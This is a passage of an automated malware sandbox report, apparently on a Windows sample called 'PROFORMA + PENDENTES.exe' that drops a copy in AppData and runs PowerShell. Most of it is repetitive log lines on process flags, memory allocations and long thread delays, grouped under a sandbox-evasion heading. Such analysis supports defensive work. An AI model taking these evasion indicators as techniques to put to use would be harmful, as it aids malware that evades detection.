              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 7924, type: MEMORYSTR
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeMemory allocated: 2560000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeMemory allocated: 2790000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeMemory allocated: 25D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeMemory allocated: 7AD0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeMemory allocated: 8AD0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeMemory allocated: 8C90000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeMemory allocated: 9C90000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeMemory allocated: FF0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeMemory allocated: 2D70000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeMemory allocated: 2BE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeMemory allocated: E00000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeMemory allocated: 2A40000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeMemory allocated: 2890000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeMemory allocated: 77A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeMemory allocated: 87A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeMemory allocated: 8950000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeMemory allocated: 9950000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeMemory allocated: 1360000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeMemory allocated: 2C90000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeMemory allocated: 4C90000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 599891Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 599641Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 599531Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 599422Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 599313Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 599188Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 599063Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 598953Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 598844Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 598719Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 598610Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 598485Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 598360Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 598235Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 598110Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 597985Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 597860Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 597735Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 597610Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 597485Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 597360Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 597235Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 597110Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 596985Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 596860Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 596735Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 596620Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 596500Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 596391Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 596266Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 596156Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 596047Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 595935Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 595828Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 595719Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 595609Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 595500Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 595391Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 595276Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 595156Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 595047Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 594938Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 594828Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 594719Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 594610Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 594485Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 594360Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeThread delayed: delay time: 594235Jump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 600000
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 599890
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 599781
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 599672
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 599562
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 599453
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 599344
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 599219
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 599109
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 599000
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 598884
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 598780
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 598672
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 598562
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 598453
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 598343
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 598232
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 598124
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 598015
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 597905
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 597797
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 597687
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 597578
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 597468
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 597359
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 597250
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 597140
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 597028
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 596921
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 596812
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 596703
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 596593
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 596483
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 596374
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 596265
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 596132
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 596031
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 595921
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 595812
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 595703
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 595593
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 595484
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 595375
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 595265
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 595156
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 595047
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 594937
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 594827
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 594716
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeThread delayed: delay time: 593751
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6148Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8422Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 539Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeWindow / User API: threadDelayed 6876Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeWindow / User API: threadDelayed 2952Jump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeWindow / User API: threadDelayed 7618
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeWindow / User API: threadDelayed 2237
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 7952Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1152Thread sleep count: 6148 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1848Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 432Thread sleep count: 243 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1036Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3232Thread sleep time: -8301034833169293s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3568Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep count: 35 > 30Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -32281802128991695s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -599891s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3120Thread sleep count: 6876 > 30Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3120Thread sleep count: 2952 > 30Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -599766s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -599641s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -599531s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -599422s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -599313s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -599188s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -599063s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -598953s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -598844s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -598719s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -598610s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -598485s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -598360s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -598235s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe TID: 3324Thread sleep time: -598110s >= -30000sJump to behavior
